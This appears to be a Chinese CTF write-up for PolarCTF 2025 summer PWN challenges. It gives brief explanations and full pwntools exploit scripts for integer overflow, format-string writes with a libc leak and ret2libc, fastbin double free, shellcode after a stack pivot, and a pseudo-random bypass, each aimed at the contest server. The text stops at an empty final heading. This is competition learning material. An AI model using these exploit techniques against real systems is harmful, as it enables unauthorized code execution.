Polarctf2025夏季赛

PWN

flow

这题主要考了一个整数溢出， unsigned __int8 n9的取值范围是0-255，因此我们可以输入长度为257的字符串使得n9的值绕过if判断，在这里需要了解python中ljust的使用。

Python ljust() 方法返回一个原字符串左对齐,并使用空格填充至指定长度的新字符串。如果指定的长度小于原字符串的长度则返回原字符串。即若代码为

str="aaaa"
print(str.ljust(50,b'0'))

那么会打印出aaaa0000…000，因此就可以优化脚本的编写。exp如下：

from pwn import*
context.log_level='debug'
elf=ELF('./flow')
io=remote('1.95.36.136',2127)

io.sendlineafter('name:',b'aaaa')
io.sendlineafter('going?',b'3')

exit=0x0804872c
system=elf.plt['system']
bin_sh=0x0804893d

payload=cyclic(0x21+4)+p32(exit)
payload=payload.ljust(258,b'a')

io.sendlineafter("shell:",payload)

exp=cyclic(0x108+4)+p32(system)+p32(0)+p32(bin_sh)
io.sendline(exp)

io.interactive()

format

这题主要考的是格式化字符串漏洞，如何使用该漏洞实现任意地址写

此题的关键在于如何将n的值改为4，因为有printf，存在格式化字符串漏洞，因此找到buf的偏移量，使用$n将n的值改为4即可。

exp：

from pwn import*
io=remote('1.95.36.136',2142)
elf=ELF('./format')
libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so')
#io=process('./format')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
main=elf.sym['main']
n_addr=0x0804A06C

io.sendafter("xiang yao shell?",b'no')

payload1=p32(n_addr)+b'%4$n'
io.sendlineafter("hello hacker!",payload1)

payload=cyclic(0x18+4)+p32(puts_plt)+p32(main)+p32(puts_got)
io.sendline(payload)

puts=u32(io.recvuntil('\xf7')[-4:])
print(hex(puts))

libc_addr=puts-libc.sym['puts']
system=libc_addr+libc.sym['system']
bin_sh=libc_addr+next(libc.search('/bin/sh'))

io.sendafter("xiang yao shell?",b'no')

payload1=p32(n_addr)+b'%4$n'
io.sendlineafter("hello hacker!",payload1)

payload=cyclic(0x18+4)+p32(system)+p32(main)+p32(bin_sh)
io.sendline(payload)

io.interactive()

bllhl_double_free

一道堆题目，打double_free

from pwn import*
io=remote('1.95.36.136',2074)

def add_chunk(index,size):
    io.sendlineafter("choice:",b'1')
    io.sendlineafter("index:",str(index))
    io.sendlineafter("size:",str(size))

def delete_chunk(index):
    io.sendlineafter("choice:",b'2')
    io.sendlineafter("index:",str(index))

def edit_chunk(index,content):
    io.sendlineafter("choice:",b'3')
    io.sendlineafter("index:",str(index))
    io.sendlineafter("length:",str(len(content)))
    io.sendlineafter("content:",content)

add_chunk(0,0x68)
add_chunk(1,0x68)
add_chunk(2,0x68)

delete_chunk(0)
delete_chunk(1)
delete_chunk(0)

add_chunk(3,0x68)

edit_chunk(0,p64(0x6020C0-0x4))

add_chunk(4,0x68)
add_chunk(5,0x68)
add_chunk(6,0x68)

edit_chunk(6,b'aaaa'+p64(0x208))

io.sendline(b'5')

io.interactive()

bllbl_shellcode4

考察的是shellcode的编写

from pwn import*
io=remote('1.95.36.136',2110)

bss_addr=0x04040C0
readbss=0x40132B
leave_ret=0x401360
sh_addr=0x40203f
jmp_rsp_0x15=0x40136A

payload=cyclic(9)+p64(bss_addr)+p64(readbss)+p64(leave_ret)
io.send(payload)

shellcode=asm(
        '''
        nop;
        nop;
        nop;
        nop;
        mov al,0x3b;
        mov esi,ebx;
        mov edi,0x40203f;
        mov edx,esi;
        syscall;
        ''')

payload=shellcode+p64(jmp_rsp_0x15)
io.send(payload)

io.interactive()

forpwn

一道简单的pwn题目，考的是伪随机数

from pwn import*
io=remote('1.95.36.136',2125)

io.send(b'1')

for i in range(5):
    io.sendline(b'0'*50)
io.interactive()

bllhl_pieee